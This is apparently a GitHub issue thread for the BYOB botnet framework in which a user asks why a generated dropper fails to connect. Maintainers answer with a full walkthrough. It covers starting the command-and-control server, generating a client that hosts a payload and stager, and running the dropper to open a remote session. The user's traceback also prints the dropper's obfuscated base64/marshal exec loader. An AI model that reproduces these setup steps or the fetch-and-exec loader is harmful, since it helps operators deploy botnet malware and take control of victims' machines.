### ISSUE TITLE
Should I exec dropper that I generated? (`python byob_dW0.py`)

### ISSUE THREAD

**Issue by kondongx** [colental/byob#17]
This is my first time to submit an issue on github. Can anyone help me?

I don't konw how to connect the server.

This is my procedure：

``` shell
$ python client.py 0.0.0.0 1338

[>] Modules
	Adding modules... - (4 modules added to client)

[>] Imports
	Adding imports... - removing _winreg import (32 imports from 4 modules)

[>] Payload
	Uploading payload... - (hosting payload at: http://0.0.0.0:1339//payloads/dW0.py)

[>] Stager
	Uploading stager...  (hosting stager at: http://0.0.0.0:1339//stagers/dW0.py)

[>] Dropper
	Writing dropper...  (saved to file: byob_dW0.py)
```

```shell
$ python server.py (it works fine.)
```

```shell
$ python byob_dW0.py (here I got an error)

File "byob_eIQ.py", line 1, in <module>
    import zlib,base64,marshal,urllib;exec(eval(marshal.loads(zlib.decompress(base64.b64decode('eJwrtmFgYCgtysnJTNIDUvkFqXka6hklJQVW+voGemBoZWhsbKmvX1ySmJ5aVKyf6hmoV1CprqlXlJqYoqEJAIT3E28=')))))
  File "<string>", line 1
    <head>
```

then I back to server and exec `clients`, and I got two blank line.

**Comment by mshirley** [comment]
Try creating the client using port 1337 instead of 1338.

```python client.py 0.0.0.0 1337```

The c2 runs on 1337 by default, the ports 1338 and 1339 are simple web services that serve up the payload and stager.

Reply back if that works or not.

**Comment by mshirley** [comment]
create a new client using 1337 and the file name will be different.  you will want to execute that new payload and delete the old one.  

the c2 stands for command and control which is the ```server.py``` running on port 1337.

https://en.wikipedia.org/wiki/Botnet#Command_and_control

it sounds like you may have running processes in the background that are stale.  this is a known bug.

```pkill -f SimpleHTTP``` which will kill the two processes that are running in the background.

confirm that those processes are no longer listening by executing this command.

```sudo netstat -alnp | grep -E '1338|1339'```

if you get any results then make sure to manually kill the pids associated to those processes.  after that launch ```server.py``` again and then create a new client using port 1337.  note: the file name will be different than ```byob_dW0.py```.  

here's the process from end to end on a ubuntu box.  I won't specify a --host or --port and just accept the defaults.

```
user@userbox:~/src$ git clone https://github.com/colental/byob.git
Cloning into 'byob'...
remote: Counting objects: 805, done.
remote: Compressing objects: 100% (75/75), done.
remote: Total 805 (delta 69), reused 87 (delta 54), pack-reused 676
Receiving objects: 100% (805/805), 1.06 MiB | 0 bytes/s, done.
Resolving deltas: 100% (431/431), done.
Checking connectivity... done.
user@userbox:~/src$ cd byob/byob/
user@userbox:~/src/byob/byob$ pip install -r requirements.txt
<snip>
user@userbox:~/src/byob/byob$ python server.py


88                                  88
88                                  88
88                                  88
88,dPPYba,  8b       d8  ,adPPYba,  88,dPPYba,
88P'    "8a `8b     d8' a8"     "8a 88P'    "8a
88       d8  `8b   d8'  8b       d8 88       d8
88b,   ,a8"   `8b,d8'   "8a,   ,a8" 88b,   ,a8"
8Y"Ybbd8"'      Y88'     `"YbbdP"'  8Y"Ybbd8"'
                d8'
               d8'


[?]  Hint: show usage information with the 'help' command

[user @ /home/user/src/byob/byob]>
```

create a new terminal and create the client.

```
user@userbox:~/src/byob/byob$ python client.py 127.0.0.1 1337


88                                  88
88                                  88
88                                  88
88,dPPYba,  8b       d8  ,adPPYba,  88,dPPYba,
88P'    "8a `8b     d8' a8"     "8a 88P'    "8a
88       d8  `8b   d8'  8b       d8 88       d8
88b,   ,a8"   `8b,d8'   "8a,   ,a8" 88b,   ,a8"
8Y"Ybbd8"'      Y88'     `"YbbdP"'  8Y"Ybbd8"'
                d8'
               d8'


[>] Modules
        Adding modules... -(4 modules added to client)

[>] Imports
        Adding imports...- - removing _winreg import (32 imports from 4 modules)

[>] Payload
        Uploading payload... - (hosting payload at: http://127.0.0.1:1338//payloads/kDe.py)

[>] Stager
        Uploading stager... -(hosting stager at: http://127.0.0.1:1338//stagers/kDe.py)

[>] Dropper
        Writing dropper...  (saved to file: byob_kDe.py)
user@userbox:~/src/byob/byob$ python byob_kDe.py
```

at this point you should see a large amount of scrolling text and a new session will be created on the server.

please note that this code is still under heavy development so bear with us as we continue to make progress.

**Comment by kondongx** [comment]
Thank you!!! You are a very nice man. I will try it in tomorrow moning and
reply.

mshirley <notifications@github.com>于2018年8月3日 周五00:47写道：

**Comment by colental** [comment]
The bug causing stale web service processes from terminating properly should now be fixed, so try with a fresh-install and it should work now.
